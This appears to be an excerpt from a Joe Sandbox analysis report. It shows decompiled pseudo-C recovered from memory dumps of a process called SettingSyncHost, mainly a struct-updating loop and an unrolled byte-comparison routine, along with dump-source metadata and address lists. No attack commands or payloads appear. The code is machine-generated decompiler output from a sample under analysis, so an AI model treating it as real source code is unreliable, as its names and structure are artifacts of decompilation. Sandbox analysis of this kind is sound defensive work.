                                                                                                                                      					if( *((intOrPtr*)(_v60 + 0x18)) == _a8) {
                                                                                                                                      						_t130 = _t127 - 8;
                                                                                                                                      						_t144 =  *0x3bbc50;
                                                                                                                                      						 *_t130 = _t144;
                                                                                                                                      						E00393700(_t112);
                                                                                                                                      						 *_t130 = _t144;
                                                                                                                                      						E003935B0(_t112);
                                                                                                                                      						 *_t130 = _t144;
                                                                                                                                      						E00393460(_t112);
                                                                                                                                      						 *_t130 = _t144;
                                                                                                                                      						E00393340();
                                                                                                                                      						st0 = _t144;
                                                                                                                                      						 *((intOrPtr*)(_v60 + 0x18)) = _a4;
                                                                                                                                      						_t132 = _t130 + 8 - 8;
                                                                                                                                      						_t145 =  *0x3bbc50;
                                                                                                                                      						 *_t132 = _t145;
                                                                                                                                      						E00393700(_t112);
                                                                                                                                      						 *_t132 = _t145;
                                                                                                                                      						E003935B0(_t112);
                                                                                                                                      						 *_t132 = _t145;
                                                                                                                                      						E00393460(_t112);
                                                                                                                                      						 *_t132 = _t145;
                                                                                                                                      						E00393340();
                                                                                                                                      						st0 = _t145;
                                                                                                                                      						_t113 = _v60;
                                                                                                                                      						 *((intOrPtr*)(_v60 + 0x1c)) = _a4 +  *((intOrPtr*)(_v48 + 0x28));
                                                                                                                                      						_t134 = _t132 + 8 - 8;
                                                                                                                                      						_t146 =  *0x3bbc50;
                                                                                                                                      						 *_t134 = _t146;
                                                                                                                                      						E00393700(_v60);
                                                                                                                                      						 *_t134 = _t146;
                                                                                                                                      						E003935B0(_t113);
                                                                                                                                      						 *_t134 = _t146;
                                                                                                                                      						E00393460(_t113);
                                                                                                                                      						 *_t134 = _t146;
                                                                                                                                      						E00393340();
                                                                                                                                      						st0 = _t146;
                                                                                                                                      						_t107 = _v48;
                                                                                                                                      						_t114 =  *((intOrPtr*)(_t107 + 0x50));
                                                                                                                                      						 *((intOrPtr*)(_v60 + 0x20)) =  *((intOrPtr*)(_t107 + 0x50));
                                                                                                                                      						_t136 = _t134 + 8 - 8;
                                                                                                                                      						_t147 =  *0x3bbc50;
                                                                                                                                      						 *_t136 = _t147;
                                                                                                                                      						E00393700( *((intOrPtr*)(_t107 + 0x50)));
                                                                                                                                      						 *_t136 = _t147;
                                                                                                                                      						E003935B0( *((intOrPtr*)(_t107 + 0x50)));
                                                                                                                                      						 *_t136 = _t147;
                                                                                                                                      						E00393460(_t114);
                                                                                                                                      						 *_t136 = _t147;
                                                                                                                                      						_t65 = E00393340();
                                                                                                                                      						st0 = _t147;
                                                                                                                                      						_t127 = _t136 + 8;
                                                                                                                                      					} else {
                                                                                                                                      						_v24 =  *_v24;
                                                                                                                                      						continue;
                                                                                                                                      					}
                                                                                                                                      					break;
                                                                                                                                      				}
                                                                                                                                      				__eflags = _t119 - _t127 + 0xfc;
                                                                                                                                      				return E003931A1(_t65, _t119 - _t127 + 0xfc);
                                                                                                                                      			}
































                                                                                                                                      0x00392129
                                                                                                                                      0x00392219
                                                                                                                                      0x00392223

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: .9
                                                                                                                                      • API String ID: 0-2798968288
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                      			E0039D88D(void* __eax, void* __ecx) {
                                                                                                                                      				void* _t196;
                                                                                                                                      				signed int _t197;
                                                                                                                                      				void* _t200;
                                                                                                                                      				signed char _t205;
                                                                                                                                      				signed char _t206;
                                                                                                                                      				signed char _t207;
                                                                                                                                      				signed char _t209;
                                                                                                                                      				signed char _t210;
                                                                                                                                      				signed int _t215;
                                                                                                                                      				signed int _t291;
                                                                                                                                      				void* _t294;
                                                                                                                                      				void* _t296;
                                                                                                                                      				void* _t298;
                                                                                                                                      				void* _t300;
                                                                                                                                      				void* _t302;
                                                                                                                                      				void* _t305;
                                                                                                                                      				void* _t307;
                                                                                                                                      				void* _t309;
                                                                                                                                      				void* _t312;
                                                                                                                                      				void* _t314;
                                                                                                                                      				void* _t316;
                                                                                                                                      				void* _t319;
                                                                                                                                      				void* _t321;
                                                                                                                                      				void* _t323;
                                                                                                                                      				void* _t326;
                                                                                                                                      				void* _t328;
                                                                                                                                      				void* _t330;
                                                                                                                                      				void* _t333;
                                                                                                                                      				void* _t335;
                                                                                                                                      				void* _t337;
                                                                                                                                      
                                                                                                                                      				_t200 = __ecx;
                                                                                                                                      				_t196 = __eax;
                                                                                                                                      				if( *((intOrPtr*)(__eax - 0x1f)) ==  *((intOrPtr*)(__ecx - 0x1f))) {
                                                                                                                                      					_t291 = 0;
                                                                                                                                      					L17:
                                                                                                                                      					if(_t291 != 0) {
                                                                                                                                      						goto L1;
                                                                                                                                      					}
                                                                                                                                      					_t205 =  *(_t196 - 0x1b);
                                                                                                                                      					if(_t205 ==  *(_t200 - 0x1b)) {
                                                                                                                                      						_t291 = 0;
                                                                                                                                      						L28:
                                                                                                                                      						if(_t291 != 0) {
                                                                                                                                      							goto L1;
                                                                                                                                      						}
                                                                                                                                      						_t206 =  *(_t196 - 0x17);
                                                                                                                                      						if(_t206 ==  *(_t200 - 0x17)) {
                                                                                                                                      							_t291 = 0;
                                                                                                                                      							L39:
                                                                                                                                      							if(_t291 != 0) {
                                                                                                                                      								goto L1;
                                                                                                                                      							}
                                                                                                                                      							_t207 =  *(_t196 - 0x13);
                                                                                                                                      							if(_t207 ==  *(_t200 - 0x13)) {
                                                                                                                                      								_t291 = 0;
                                                                                                                                      								L50:
                                                                                                                                      								if(_t291 != 0) {
                                                                                                                                      									goto L1;
                                                                                                                                      								}
                                                                                                                                      								if( *(_t196 - 0xf) ==  *(_t200 - 0xf)) {
                                                                                                                                      									_t291 = 0;
                                                                                                                                      									L61:
                                                                                                                                      									if(_t291 != 0) {
                                                                                                                                      										goto L1;
                                                                                                                                      									}
                                                                                                                                      									_t209 =  *(_t196 - 0xb);
                                                                                                                                      									if(_t209 ==  *(_t200 - 0xb)) {
                                                                                                                                      										_t291 = 0;
                                                                                                                                      										L72:
                                                                                                                                      										if(_t291 != 0) {
                                                                                                                                      											goto L1;
                                                                                                                                      										}
                                                                                                                                      										_t210 =  *(_t196 - 7);
                                                                                                                                      										if(_t210 ==  *(_t200 - 7)) {
                                                                                                                                      											_t291 = 0;
                                                                                                                                      											L83:
                                                                                                                                      											if(_t291 != 0) {
                                                                                                                                      												goto L1;
                                                                                                                                      											}
                                                                                                                                      											_t294 = ( *(_t196 - 3) & 0x000000ff) - ( *(_t200 - 3) & 0x000000ff);
                                                                                                                                      											if(_t294 == 0) {
                                                                                                                                      												L5:
                                                                                                                                      												_t296 = ( *(_t196 - 2) & 0x000000ff) - ( *(_t200 - 2) & 0x000000ff);
                                                                                                                                      												if(_t296 == 0) {
                                                                                                                                      													L3:
                                                                                                                                      													_t197 = ( *(_t196 - 1) & 0x000000ff) - ( *(_t200 - 1) & 0x000000ff);
                                                                                                                                      													if(_t197 != 0) {
                                                                                                                                      														_t8 = (0 | _t197 > 0x00000000) - 1; // -1
                                                                                                                                      														_t197 = (_t197 > 0) + _t8;
                                                                                                                                      													}
                                                                                                                                      													L2:
                                                                                                                                      													return _t197;
                                                                                                                                      												}
                                                                                                                                      												_t215 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                                                                                                                                      												if(_t215 != 0) {
                                                                                                                                      													L86:
                                                                                                                                      													_t197 = _t215;
                                                                                                                                      													goto L2;
                                                                                                                                      												} else {
                                                                                                                                      													goto L3;
                                                                                                                                      												}
                                                                                                                                      											}
                                                                                                                                      											_t215 = (0 | _t294 > 0x00000000) + (0 | _t294 > 0x00000000) - 1;
                                                                                                                                      											if(_t215 == 0) {
                                                                                                                                      												goto L5;
                                                                                                                                      											}
                                                                                                                                      											goto L86;
                                                                                                                                      										}
                                                                                                                                      										_t298 = (_t210 & 0x000000ff) - ( *(_t200 - 7) & 0x000000ff);
                                                                                                                                      										if(_t298 == 0) {
                                                                                                                                      											L76:
                                                                                                                                      											_t300 = ( *(_t196 - 6) & 0x000000ff) - ( *(_t200 - 6) & 0x000000ff);
                                                                                                                                      											if(_t300 == 0) {
                                                                                                                                      												L78:
                                                                                                                                      												_t302 = ( *(_t196 - 5) & 0x000000ff) - ( *(_t200 - 5) & 0x000000ff);
                                                                                                                                      												if(_t302 == 0) {
                                                                                                                                      													L80:
                                                                                                                                      													_t291 = ( *(_t196 - 4) & 0x000000ff) - ( *(_t200 - 4) & 0x000000ff);
                                                                                                                                      													if(_t291 != 0) {
                                                                                                                                      														_t189 = (0 | _t291 > 0x00000000) - 1; // -1
                                                                                                                                      														_t291 = (_t291 > 0) + _t189;
                                                                                                                                      													}
                                                                                                                                      													goto L83;
                                                                                                                                      												}
                                                                                                                                      												_t183 = (0 | _t302 > 0x00000000) - 1; // -1
                                                                                                                                      												_t291 = (_t302 > 0) + _t183;
                                                                                                                                      												if(_t291 != 0) {
                                                                                                                                      													goto L1;
                                                                                                                                      												}
                                                                                                                                      												goto L80;
                                                                                                                                      											}
                                                                                                                                      											_t177 = (0 | _t300 > 0x00000000) - 1; // -1
                                                                                                                                      											_t291 = (_t300 > 0) + _t177;
                                                                                                                                      											if(_t291 != 0) {
                                                                                                                                      												goto L1;
                                                                                                                                      											}
                                                                                                                                      											goto L78;
                                                                                                                                      										}
                                                                                                                                      										_t171 = (0 | _t298 > 0x00000000) - 1; // -1
                                                                                                                                      										_t291 = (_t298 > 0) + _t171;
                                                                                                                                      										if(_t291 != 0) {
                                                                                                                                      											goto L1;
                                                                                                                                      										}
                                                                                                                                      										goto L76;
                                                                                                                                      									}
                                                                                                                                      									_t305 = (_t209 & 0x000000ff) - ( *(_t200 - 0xb) & 0x000000ff);
                                                                                                                                      									if(_t305 == 0) {
                                                                                                                                      										L65:
                                                                                                                                      										_t307 = ( *(_t196 - 0xa) & 0x000000ff) - ( *(_t200 - 0xa) & 0x000000ff);
                                                                                                                                      										if(_t307 == 0) {
                                                                                                                                      											L67:
                                                                                                                                      											_t309 = ( *(_t196 - 9) & 0x000000ff) - ( *(_t200 - 9) & 0x000000ff);
                                                                                                                                      											if(_t309 == 0) {
                                                                                                                                      												L69:
                                                                                                                                      												_t291 = ( *(_t196 - 8) & 0x000000ff) - ( *(_t200 - 8) & 0x000000ff);
                                                                                                                                      												if(_t291 != 0) {
                                                                                                                                      													_t164 = (0 | _t291 > 0x00000000) - 1; // -1
                                                                                                                                      													_t291 = (_t291 > 0) + _t164;
                                                                                                                                      												}
                                                                                                                                      												goto L72;
                                                                                                                                      											}
                                                                                                                                      											_t158 = (0 | _t309 > 0x00000000) - 1; // -1
                                                                                                                                      											_t291 = (_t309 > 0) + _t158;
                                                                                                                                      											if(_t291 != 0) {
                                                                                                                                      												goto L1;
                                                                                                                                      											}
                                                                                                                                      											goto L69;
                                                                                                                                      										}
                                                                                                                                      										_t152 = (0 | _t307 > 0x00000000) - 1; // -1
                                                                                                                                      										_t291 = (_t307 > 0) + _t152;
                                                                                                                                      										if(_t291 != 0) {
                                                                                                                                      											goto L1;
                                                                                                                                      										}
                                                                                                                                      										goto L67;
                                                                                                                                      									}
                                                                                                                                      									_t146 = (0 | _t305 > 0x00000000) - 1; // -1
                                                                                                                                      									_t291 = (_t305 > 0) + _t146;
                                                                                                                                      									if(_t291 != 0) {
                                                                                                                                      										goto L1;
                                                                                                                                      									}
                                                                                                                                      									goto L65;
                                                                                                                                      								}
                                                                                                                                      								_t312 = ( *(_t196 - 0xf) & 0x000000ff) - ( *(_t200 - 0xf) & 0x000000ff);
                                                                                                                                      								if(_t312 == 0) {
                                                                                                                                      									L54:
                                                                                                                                      									_t314 = ( *(_t196 - 0xe) & 0x000000ff) - ( *(_t200 - 0xe) & 0x000000ff);
                                                                                                                                      									if(_t314 == 0) {
                                                                                                                                      										L56:
                                                                                                                                      										_t316 = ( *(_t196 - 0xd) & 0x000000ff) - ( *(_t200 - 0xd) & 0x000000ff);
                                                                                                                                      										if(_t316 == 0) {
                                                                                                                                      											L58:
                                                                                                                                      											_t291 = ( *(_t196 - 0xc) & 0x000000ff) - ( *(_t200 - 0xc) & 0x000000ff);
                                                                                                                                      											if(_t291 != 0) {
                                                                                                                                      												_t139 = (0 | _t291 > 0x00000000) - 1; // -1
                                                                                                                                      												_t291 = (_t291 > 0) + _t139;
                                                                                                                                      											}
                                                                                                                                      											goto L61;
                                                                                                                                      										}
                                                                                                                                      										_t133 = (0 | _t316 > 0x00000000) - 1; // -1
                                                                                                                                      										_t291 = (_t316 > 0) + _t133;
                                                                                                                                      										if(_t291 != 0) {
                                                                                                                                      											goto L1;
                                                                                                                                      										}
                                                                                                                                      										goto L58;
                                                                                                                                      									}
                                                                                                                                      									_t127 = (0 | _t314 > 0x00000000) - 1; // -1
                                                                                                                                      									_t291 = (_t314 > 0) + _t127;
                                                                                                                                      									if(_t291 != 0) {
                                                                                                                                      										goto L1;
                                                                                                                                      									}
                                                                                                                                      									goto L56;
                                                                                                                                      								}
                                                                                                                                      								_t121 = (0 | _t312 > 0x00000000) - 1; // -1
                                                                                                                                      								_t291 = (_t312 > 0) + _t121;
                                                                                                                                      								if(_t291 != 0) {
                                                                                                                                      									goto L1;
                                                                                                                                      								}
                                                                                                                                      								goto L54;
                                                                                                                                      							}
                                                                                                                                      							_t319 = (_t207 & 0x000000ff) - ( *(_t200 - 0x13) & 0x000000ff);
                                                                                                                                      							if(_t319 == 0) {
                                                                                                                                      								L43:
                                                                                                                                      								_t321 = ( *(_t196 - 0x12) & 0x000000ff) - ( *(_t200 - 0x12) & 0x000000ff);
                                                                                                                                      								if(_t321 == 0) {
                                                                                                                                      									L45:
                                                                                                                                      									_t323 = ( *(_t196 - 0x11) & 0x000000ff) - ( *(_t200 - 0x11) & 0x000000ff);
                                                                                                                                      									if(_t323 == 0) {
                                                                                                                                      										L47:
                                                                                                                                      										_t291 = ( *(_t196 - 0x10) & 0x000000ff) - ( *(_t200 - 0x10) & 0x000000ff);
                                                                                                                                      										if(_t291 != 0) {
                                                                                                                                      											_t113 = (0 | _t291 > 0x00000000) - 1; // -1
                                                                                                                                      											_t291 = (_t291 > 0) + _t113;
                                                                                                                                      										}
                                                                                                                                      										goto L50;
                                                                                                                                      									}
                                                                                                                                      									_t107 = (0 | _t323 > 0x00000000) - 1; // -1
                                                                                                                                      									_t291 = (_t323 > 0) + _t107;
                                                                                                                                      									if(_t291 != 0) {
                                                                                                                                      										goto L1;
                                                                                                                                      									}
                                                                                                                                      									goto L47;
                                                                                                                                      								}
                                                                                                                                      								_t101 = (0 | _t321 > 0x00000000) - 1; // -1
                                                                                                                                      								_t291 = (_t321 > 0) + _t101;
                                                                                                                                      								if(_t291 != 0) {
                                                                                                                                      									goto L1;
                                                                                                                                      								}
                                                                                                                                      								goto L45;
                                                                                                                                      							}
                                                                                                                                      							_t95 = (0 | _t319 > 0x00000000) - 1; // -1
                                                                                                                                      							_t291 = (_t319 > 0) + _t95;
                                                                                                                                      							if(_t291 != 0) {
                                                                                                                                      								goto L1;
                                                                                                                                      							}
                                                                                                                                      							goto L43;
                                                                                                                                      						}
                                                                                                                                      						_t326 = (_t206 & 0x000000ff) - ( *(_t200 - 0x17) & 0x000000ff);
                                                                                                                                      						if(_t326 == 0) {
                                                                                                                                      							L32:
                                                                                                                                      							_t328 = ( *(_t196 - 0x16) & 0x000000ff) - ( *(_t200 - 0x16) & 0x000000ff);
                                                                                                                                      							if(_t328 == 0) {
                                                                                                                                      								L34:
                                                                                                                                      								_t330 = ( *(_t196 - 0x15) & 0x000000ff) - ( *(_t200 - 0x15) & 0x000000ff);
                                                                                                                                      								if(_t330 == 0) {
                                                                                                                                      									L36:
                                                                                                                                      									_t291 = ( *(_t196 - 0x14) & 0x000000ff) - ( *(_t200 - 0x14) & 0x000000ff);
                                                                                                                                      									if(_t291 != 0) {
                                                                                                                                      										_t88 = (0 | _t291 > 0x00000000) - 1; // -1
                                                                                                                                      										_t291 = (_t291 > 0) + _t88;
                                                                                                                                      									}
                                                                                                                                      									goto L39;
                                                                                                                                      								}
                                                                                                                                      								_t82 = (0 | _t330 > 0x00000000) - 1; // -1
                                                                                                                                      								_t291 = (_t330 > 0) + _t82;
                                                                                                                                      								if(_t291 != 0) {
                                                                                                                                      									goto L1;
                                                                                                                                      								}
                                                                                                                                      								goto L36;
                                                                                                                                      							}
                                                                                                                                      							_t76 = (0 | _t328 > 0x00000000) - 1; // -1
                                                                                                                                      							_t291 = (_t328 > 0) + _t76;
                                                                                                                                      							if(_t291 != 0) {
                                                                                                                                      								goto L1;
                                                                                                                                      							}
                                                                                                                                      							goto L34;
                                                                                                                                      						}
                                                                                                                                      						_t70 = (0 | _t326 > 0x00000000) - 1; // -1
                                                                                                                                      						_t291 = (_t326 > 0) + _t70;
                                                                                                                                      						if(_t291 != 0) {
                                                                                                                                      							goto L1;
                                                                                                                                      						}
                                                                                                                                      						goto L32;
                                                                                                                                      					}
                                                                                                                                      					_t333 = (_t205 & 0x000000ff) - ( *(_t200 - 0x1b) & 0x000000ff);
                                                                                                                                      					if(_t333 == 0) {
                                                                                                                                      						L21:
                                                                                                                                      						_t335 = ( *(_t196 - 0x1a) & 0x000000ff) - ( *(_t200 - 0x1a) & 0x000000ff);
                                                                                                                                      						if(_t335 == 0) {
                                                                                                                                      							L23:
                                                                                                                                      							_t337 = ( *(_t196 - 0x19) & 0x000000ff) - ( *(_t200 - 0x19) & 0x000000ff);
                                                                                                                                      							if(_t337 == 0) {
                                                                                                                                      								L25:
                                                                                                                                      								_t291 = ( *(_t196 - 0x18) & 0x000000ff) - ( *(_t200 - 0x18) & 0x000000ff);
                                                                                                                                      								if(_t291 != 0) {
                                                                                                                                      									_t63 = (0 | _t291 > 0x00000000) - 1; // -1
                                                                                                                                      									_t291 = (_t291 > 0) + _t63;
                                                                                                                                      								}
                                                                                                                                      								goto L28;
                                                                                                                                      							}
                                                                                                                                      							_t57 = (0 | _t337 > 0x00000000) - 1; // -1
                                                                                                                                      							_t291 = (_t337 > 0) + _t57;
                                                                                                                                      							if(_t291 != 0) {
                                                                                                                                      								goto L1;
                                                                                                                                      							}
                                                                                                                                      							goto L25;
                                                                                                                                      						}
                                                                                                                                      						_t51 = (0 | _t335 > 0x00000000) - 1; // -1
                                                                                                                                      						_t291 = (_t335 > 0) + _t51;
                                                                                                                                      						if(_t291 != 0) {
                                                                                                                                      							goto L1;
                                                                                                                                      						}
                                                                                                                                      						goto L23;
                                                                                                                                      					}
                                                                                                                                      					_t45 = (0 | _t333 > 0x00000000) - 1; // -1
                                                                                                                                      					_t291 = (_t333 > 0) + _t45;
                                                                                                                                      					if(_t291 != 0) {
                                                                                                                                      						goto L1;
                                                                                                                                      					}
                                                                                                                                      					goto L21;
                                                                                                                                      				} else {
                                                                                                                                      					__edx =  *(__ecx - 0x1f) & 0x000000ff;
                                                                                                                                      					__esi =  *(__eax - 0x1f) & 0x000000ff;
                                                                                                                                      					__esi = ( *(__eax - 0x1f) & 0x000000ff) - ( *(__ecx - 0x1f) & 0x000000ff);
                                                                                                                                      					if(__esi == 0) {
                                                                                                                                      						L10:
                                                                                                                                      						__esi =  *(__eax - 0x1e) & 0x000000ff;
                                                                                                                                      						__edx =  *(__ecx - 0x1e) & 0x000000ff;
                                                                                                                                      						__esi = ( *(__eax - 0x1e) & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
                                                                                                                                      						if(__esi == 0) {
                                                                                                                                      							L12:
                                                                                                                                      							__esi =  *(__eax - 0x1d) & 0x000000ff;
                                                                                                                                      							__edx =  *(__ecx - 0x1d) & 0x000000ff;
                                                                                                                                      							__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
                                                                                                                                      							if(__esi == 0) {
                                                                                                                                      								L14:
                                                                                                                                      								__esi =  *(__eax - 0x1c) & 0x000000ff;
                                                                                                                                      								__edx =  *(__ecx - 0x1c) & 0x000000ff;
                                                                                                                                      								__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                                                                                                                                      								if(__esi != 0) {
                                                                                                                                      									__edx = 0;
                                                                                                                                      									_t38 = (0 | __esi > 0x00000000) - 1; // -1
                                                                                                                                      									__esi = (__esi > 0) + _t38;
                                                                                                                                      								}
                                                                                                                                      								goto L17;
                                                                                                                                      							}
                                                                                                                                      							__edx = 0;
                                                                                                                                      							__edx = 0 | __esi > 0x00000000;
                                                                                                                                      							_t32 = __edx - 1; // -1
                                                                                                                                      							__esi = __edx + _t32;
                                                                                                                                      							if(__edx + _t32 != 0) {
                                                                                                                                      								goto L1;
                                                                                                                                      							}
                                                                                                                                      							goto L14;
                                                                                                                                      						}
                                                                                                                                      						__edx = 0;
                                                                                                                                      						__edx = 0 | __esi > 0x00000000;
                                                                                                                                      						_t26 = __edx - 1; // -1
                                                                                                                                      						__esi = __edx + _t26;
                                                                                                                                      						if(__edx + _t26 != 0) {
                                                                                                                                      							goto L1;
                                                                                                                                      						}
                                                                                                                                      						goto L12;
                                                                                                                                      					}
                                                                                                                                      					__edx = 0;
                                                                                                                                      					__edx = 0 | __esi > 0x00000000;
                                                                                                                                      					_t20 = __edx - 1; // -1
                                                                                                                                      					__esi = __edx + _t20;
                                                                                                                                      					if(__edx + _t20 != 0) {
                                                                                                                                      						goto L1;
                                                                                                                                      					}
                                                                                                                                      					goto L10;
                                                                                                                                      				}
                                                                                                                                      				L1:
                                                                                                                                      				_t197 = _t291;
                                                                                                                                      				goto L2;
                                                                                                                                      			}
                                                                                                                                      0x0039db90
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039db90
                                                                                                                                      0x0039db6b
                                                                                                                                      0x0039db6b
                                                                                                                                      0x0039db71
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039db71
                                                                                                                                      0x0039db4c
                                                                                                                                      0x0039db4c
                                                                                                                                      0x0039db52
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039db52
                                                                                                                                      0x0039daba
                                                                                                                                      0x0039dabc
                                                                                                                                      0x0039dad1
                                                                                                                                      0x0039dad9
                                                                                                                                      0x0039dadb
                                                                                                                                      0x0039daf0
                                                                                                                                      0x0039daf8
                                                                                                                                      0x0039dafa
                                                                                                                                      0x0039db0f
                                                                                                                                      0x0039db17
                                                                                                                                      0x0039db19
                                                                                                                                      0x0039db22
                                                                                                                                      0x0039db22
                                                                                                                                      0x0039db22
                                                                                                                                      0x00000000
                                                                                                                                      0x0039db19
                                                                                                                                      0x0039db03
                                                                                                                                      0x0039db03
                                                                                                                                      0x0039db09
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039db09
                                                                                                                                      0x0039dae4
                                                                                                                                      0x0039dae4
                                                                                                                                      0x0039daea
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039daea
                                                                                                                                      0x0039dac5
                                                                                                                                      0x0039dac5
                                                                                                                                      0x0039dacb
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039dacb
                                                                                                                                      0x0039da32
                                                                                                                                      0x0039da34
                                                                                                                                      0x0039da49
                                                                                                                                      0x0039da51
                                                                                                                                      0x0039da53
                                                                                                                                      0x0039da68
                                                                                                                                      0x0039da70
                                                                                                                                      0x0039da72
                                                                                                                                      0x0039da87
                                                                                                                                      0x0039da8f
                                                                                                                                      0x0039da91
                                                                                                                                      0x0039da9a
                                                                                                                                      0x0039da9a
                                                                                                                                      0x0039da9a
                                                                                                                                      0x00000000
                                                                                                                                      0x0039da91
                                                                                                                                      0x0039da7b
                                                                                                                                      0x0039da7b
                                                                                                                                      0x0039da81
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039da81
                                                                                                                                      0x0039da5c
                                                                                                                                      0x0039da5c
                                                                                                                                      0x0039da62
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039da62
                                                                                                                                      0x0039da3d
                                                                                                                                      0x0039da3d
                                                                                                                                      0x0039da43
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039da43
                                                                                                                                      0x0039d9ab
                                                                                                                                      0x0039d9ad
                                                                                                                                      0x0039d9c2
                                                                                                                                      0x0039d9ca
                                                                                                                                      0x0039d9cc
                                                                                                                                      0x0039d9e1
                                                                                                                                      0x0039d9e9
                                                                                                                                      0x0039d9eb
                                                                                                                                      0x0039da00
                                                                                                                                      0x0039da08
                                                                                                                                      0x0039da0a
                                                                                                                                      0x0039da13
                                                                                                                                      0x0039da13
                                                                                                                                      0x0039da13
                                                                                                                                      0x00000000
                                                                                                                                      0x0039da0a
                                                                                                                                      0x0039d9f4
                                                                                                                                      0x0039d9f4
                                                                                                                                      0x0039d9fa
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d9fa
                                                                                                                                      0x0039d9d5
                                                                                                                                      0x0039d9d5
                                                                                                                                      0x0039d9db
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d9db
                                                                                                                                      0x0039d9b6
                                                                                                                                      0x0039d9b6
                                                                                                                                      0x0039d9bc
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d9bc
                                                                                                                                      0x0039d924
                                                                                                                                      0x0039d926
                                                                                                                                      0x0039d93b
                                                                                                                                      0x0039d943
                                                                                                                                      0x0039d945
                                                                                                                                      0x0039d95a
                                                                                                                                      0x0039d962
                                                                                                                                      0x0039d964
                                                                                                                                      0x0039d979
                                                                                                                                      0x0039d981
                                                                                                                                      0x0039d983
                                                                                                                                      0x0039d98c
                                                                                                                                      0x0039d98c
                                                                                                                                      0x0039d98c
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d983
                                                                                                                                      0x0039d96d
                                                                                                                                      0x0039d96d
                                                                                                                                      0x0039d973
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d973
                                                                                                                                      0x0039d94e
                                                                                                                                      0x0039d94e
                                                                                                                                      0x0039d954
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d954
                                                                                                                                      0x0039d92f
                                                                                                                                      0x0039d92f
                                                                                                                                      0x0039d935
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d895
                                                                                                                                      0x0039d895
                                                                                                                                      0x0039d899
                                                                                                                                      0x0039d89d
                                                                                                                                      0x0039d89f
                                                                                                                                      0x0039d8b4
                                                                                                                                      0x0039d8b4
                                                                                                                                      0x0039d8b8
                                                                                                                                      0x0039d8bc
                                                                                                                                      0x0039d8be
                                                                                                                                      0x0039d8d3
                                                                                                                                      0x0039d8d3
                                                                                                                                      0x0039d8d7
                                                                                                                                      0x0039d8db
                                                                                                                                      0x0039d8dd
                                                                                                                                      0x0039d8f2
                                                                                                                                      0x0039d8f2
                                                                                                                                      0x0039d8f6
                                                                                                                                      0x0039d8fa
                                                                                                                                      0x0039d8fc
                                                                                                                                      0x0039d8fe
                                                                                                                                      0x0039d905
                                                                                                                                      0x0039d905
                                                                                                                                      0x0039d905
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d8fc
                                                                                                                                      0x0039d8df

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
